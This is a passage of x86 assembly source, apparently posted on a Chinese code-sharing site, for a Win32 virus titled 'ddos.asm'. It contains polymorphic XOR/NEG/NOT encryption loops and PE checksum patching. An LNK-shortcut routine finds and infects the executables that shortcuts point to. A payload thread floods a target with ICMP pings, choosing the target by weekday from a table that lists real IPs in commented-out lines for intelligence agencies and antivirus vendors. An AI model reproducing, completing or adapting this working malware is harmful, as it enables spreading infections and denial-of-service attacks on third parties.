📄 ddos.asm
字号:
xor ax, dx
xchg al, ah
stosw
loop EnCryptLoop
pop esi ; let's start decrypting with the second layer
add esi, 05h ; skip the call
mov ecx, FirstLSize ; mov size to ecx
mov edi, esi
mov edx, dword ptr [ebp+CryptType]
xor eax, eax
XorEncrypt: ; we use a simple xor
dec edx
jnz NegEncrypt
mov dl, byte ptr [ebp+PolyKey]
@Xor:
lodsb
xor al, dl
stosb
loop @Xor
jmp EndPolyCrypto
NegEncrypt:
dec edx
jnz NotEncrypt
@Neg:
lodsb
neg al
stosb
loop @Neg
jmp End2LCrypto
NotEncrypt: ; not byte ptr [esi]
dec edx
jnz IncEncrypt
@Not:
lodsb
not al
stosb
loop @Not
jmp End2LCrypto
IncEncrypt: ; inc byte ptr [esi]
dec edx
jnz DecEncrypt
@Inc:
lodsb
dec al
stosb
loop @Inc
jmp End2LCrypto
DecEncrypt: ; dec byte ptr [esi]
lodsb
inc al
stosb
loop DecEncrypt
End2LCrypto:
dec byte ptr [ebp+InfCounter]
; if we succesfully received the dll and the
; function, we create a checksum for the
; file ( needed for dll's and WinNT )
cmp [ebp+XCheckSumMappedFile], 0h
je NoCRC
lea esi, [ebp+CheckSum]
push esi
lea esi, [ebp+HeaderSum]
push esi
push dword ptr [ebp+NewSize]
push dword ptr [ebp+MapAddress]
call dword ptr [ebp+XCheckSumMappedFile]
test eax, eax ; if this failed we don't save
jz NoCRC ; the crc
mov eax, dword ptr [ebp+MapAddress]
; eax points to the dos-stub
mov esi, [eax+3Ch] ; esi points to PE-Header
add esi, eax ; save CRC in header
mov eax, dword ptr [ebp+CheckSum]
mov [esi+58h], eax
NoCRC:
ret
NoEXE: ; let's return and close the infected file
; this will also write it to disk !
stc
ret
; ***************************************************************************
; ------------------------[ Infect an LNK-FILE ]-----------------------------
; ***************************************************************************
InfectLNK: ; if we find a link file, we try to find the
; file it points to. If it is a EXE File we are able
; to infect, we do so
; this will not work with NT-LNK-Files, there we will
; receive only the Drive, where the file is located
; ok, if a LNK is bigger than 1 Meg, it is none
; we check .. ;)
cmp dword ptr [ebp+WFD_nFileSizeLow] , 0400h
ja NoLNK
; get the start addy in esi, and and the size
mov esi, dword ptr [ebp+MapAddress]
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
xor edx, edx
add esi, ecx ; we start checking at the end of the file
; for a valid filename in it
CheckLoop:
cmp byte ptr [esi], 3ah ; we detect a filename by the 2 dots ( 3ah = : )
jne LNKSearch ; in the Drive
inc edx ; there are 2 times 2 dots, when checking from
cmp edx, 2d ; the end of the LNK, we need the 2.nd
je PointsDetected
LNKSearch: ; go on searching
dec esi
loop CheckLoop
; if we end here, we did not find the two dots.. :(
NoLNK:
ret
PointsDetected: ; we found the drive ( two dots ... *g* )
; esi points to them, now we need to check
; for the start of the name..
cmp byte ptr [esi+1], 0h ; check if we got an entire path or just a
je NoLNK ; single drive ( may happen in NT / 2k )
PointsDetected2:
dec esi
cmp byte ptr [esi], 0h
je NameDetected
loop PointsDetected2 ; ecx still takes care, that we don't
; search too far..
jmp NoLNK ; nothing found ? return..
NameDetected: ; ok, esi points now to the name of the file
; so we try a FindFileFirst to get the information
; first, we save the information in the WIN32_FIND_DATA
; then we try to find the file.
inc esi
push esi ; save it
lea esi, [ebp+WIN32_FIND_DATA]
lea edi, [ebp+Buffer] ; save the old WIN32_FIND_DATA
mov ecx, 337d ; and some more data
rep movsb
lea edi, [ebp+WIN32_FIND_DATA]
xor eax, eax ; clean this field
mov ecx, 337d
rep stosb
pop esi
call FindFirstFileProc
inc eax
jz RestoreLNK ; If there are no files, we return
dec eax
; otherwise we save the handle
; if we went here, we know the file exists
; esi still points to the filename including the
; directory, we save this in the win32_Find_DATA
; field, because the name there contains no path
lea edi, [ebp+WFD_szFileName]
mov ecx, 259d ; we just move 259 Bytes, so there is still a ending
; Zero if the name is longer and we just get a simple error
; and not an SEH or some other shit
rep movsb
lea esi, [ebp+WFD_szFileName]
call InfectFile ; esi points to the filename again, so we infect it ;)
push dword ptr [ebp+LNKFindHandle]
call dword ptr [ebp+XFindClose]
RestoreLNK:
lea edi, [ebp+WIN32_FIND_DATA]
lea esi, [ebp+Buffer] ; restore the old WIN32_FIND_DATA
mov ecx, 337d ; and some other data
rep movsb
ret ; return to find more files
LNKFindHandle dd 0h ; here we save the search-handle
; ***************************************************************************
; ---------------------[ The evil Part: the Payload ]------------------------
; ***************************************************************************
PayLoad: ; here we handle the payload of the virus *eg*
cmp dword ptr [ebp+W32Handle],0
jne ExecuteHost
cmp dword ptr [ebp+XCreateThread],0
je ExecuteHost ; we better check this, cause this api does not exist in 2k
lea eax, [ebp+SystemTime] ; retrieve current date, time,.. whatever
push eax
call dword ptr [ebp+XGetSystemTime]
lea esi, [ebp+wDayOfWeek] ; get the day
xor eax, eax
lodsw
shl eax, 2h ; multiply with 4
; get Target
lea esi, [ebp+TargetTable]
add esi, eax
lea edi, [ebp+Target_IP] ; write IP to Destination Address Field
movsd
; we get a nice target for the payload
; and create a new thread to fulfill it ;)
push offset threadID ; here we save the thread ID
push 0h
push 0h
push offset PingFlood ; here starts the code of the new thread
push 0h
push 0h
call dword ptr [ebp+XCreateThread]
jmp ExecuteHost ; we're finished, so we execute the host-file
PingFlood: ; this is the thread of the payload !
; here are we doing the really evil thingies ;)
; we will start pinging a server ;P
lea eax, [ebp+offset WSA_DATA]
push eax ; where is it..
push 0101h ; required version
call dword ptr [ebp+XWSAStartup]
push 1 ; We want to use the icmp protocoll
push 3 ; SOCK_STREAM
push 2 ; Address Format
call dword ptr [ebp+Xsocket]
mov dword ptr [ebp+ICMP_Handle], eax
push 4 ; set the options ( timeout, not really
; nessecairy in this case *g* )
lea eax, [ebp+offset Timeout]
push eax
push 1006h
push 0FFFFh
push eax
call dword ptr [ebp+Xsetsockopt]
; we need to create a checksum for the packet
lea esi, [ebp+ICMP_Packet]; nothing serious just some additions
push 6 ; we do this for 6 words
pop ecx ; = 12 bytes
xor edx, edx
CreateICMP_CRC: ; load one
lodsw
movzx eax, ax ; mov it to eax ( clean upper part of eax )
add edx, eax ; add it to edx ( we just add them all )
loop CreateICMP_CRC
movzx eax, dx ; add the lower ( dx ) and the upper part of
shr edx, 16d ; edx together in eax
add eax, edx
movzx edx, ax ; save ax in edx
shr eax, 16d ; mov upper part of eax to ax ( clean upper part )
add eax, edx ; add old ax to new ax ( add upper part to lower part )
not eax ; eax = - 1 * ( eax + 1 )
; this is our checksum
mov word ptr [ebp+ICMP_CRC], ax
push 16d ; get it out, we send our packet !
lea eax, [ebp+offset Info]
push eax
push 0
push 12d
lea eax, [ebp+offset ICMP_Packet]
push eax
push dword ptr [ebp+ICMP_Handle]
call dword ptr [ebp+Xsendto]
CloseSocket: ; close the socket, to stay stable ;)
push dword ptr [ebp+ICMP_Handle]
call dword ptr [ebp+Xclosesocket]
call dword ptr [ebp+XWSACleanup]
jmp PingFlood ; heh that was fun, let's do it again ;)
Timeout dd 100000d ; 10000 ms Timeout ( we don't really care about it *g* )
Info:
dw 2h
dw 0h
Target_IP db 0d, 0d, 0d, 0d
dd 0h ; there we will fill in the target ip address ;)
ICMP_Packet db 8h
db 0h
ICMP_CRC dw 0h ; for the CRC Calculation of the ping
dd 0h
dd 0h
dd 0h
ICMP_Handle dd 0h ; the handle of the open Socket
TargetTable: ; these are our targets
; please note again, that i don't want to damage one
; of these servers ! I choose them because I think that
; they will stand such an attack if anyone will ever release this
; into the wild !!!
;db 33d, 0d, 168d, 192d ; Sunday = www.bundesnachrichtendienst.de
;db 33d, 0d, 168d, 192d ; Monday = French Secret Service ( dgse.citeweb.net )
;db 33d, 0d, 168d, 192d ; Tuesday = www.avp.com ( AV )
;db 33d, 0d, 168d, 192d ; Wednesday = www.lockdown2000.com
;db 33d, 0d, 168d, 192d ; Thursday = www.f-secure.com
;db 33d, 0d, 168d, 192d ; Friday = www.norton.com
;db 33d, 0d, 168d, 192d ; Saturday = www.zonelabs.com
db 192d, 168d, 1d, 87d ; Sunday = www.bundesnachrchtendienst.de
db 192d, 168d, 1d, 87d ; Monday = French Secret Service ( dgse.citeweb.net )
db 192d, 168d, 1d, 87d ; Tuesday = www.avp.com ( AV )
db 192d, 168d, 1d, 87d ; Wednesday = www.lockdown2000.com
db 192d, 168d, 1d, 87d ; Thursday = www.f-secure.com
db 192d, 168d, 1d, 87d ; Friday = www.norton.com
db 192d, 168d, 1d, 87d ; Saturday = www.zonelabs.com
;db 62d, 156d, 146d, 231d ; Sunday = www.bundesnachrichtendienst.de
;db 195d, 154d, 220d, 34d ; Monday = French Secret Service ( dgse.citeweb.net )
;db 216d, 122d, 8d, 245d ; Tuesday = www.avp.com ( AV )
;db 216d, 41d, 20d, 75d ; Wednesday = www.lockdown2000.com
;db 194d, 252d, 6d, 47d ; Thursday = www.f-secure.com
;db 208d, 226d, 167d, 23d ; Friday = www.norton.com
;db 205d, 178d, 21d, 3d ; Saturday = www.zonelabs.com
; ***************************************************************************
; -------------------------[ Align-Procedure ]-------------------------------
; ***************************************************************************
; lets align the size..
; eax - size
; ecx - base
Align:
push edx
xor edx, edx
push eax
div ecx
pop eax
sub ecx, edx
add eax, ecx
pop edx ; eax - new size
ret
; ***************************************************************************
; --------------------------[ FindFile Procedures ]--------------------------
; ***************************************************************************
FindFirstFileProc:
lea eax, [ebp+WIN32_FIND_DATA]
push eax
push esi
call dword ptr [ebp+XFindFirstFileA]
mov dword ptr [ebp+FindHandle], eax
ret
FindNextFileProc:
lea edi, [ebp+WFD_szFileName]
mov ecx, 276d ; we clear these fields !
xor eax, eax
rep stosb
lea eax, [ebp+WIN32_FIND_DATA]
push eax
mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindNextFileA]
ret
CheckFileName:
pushad
lea esi, [ebp+WFD_szFileName]
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -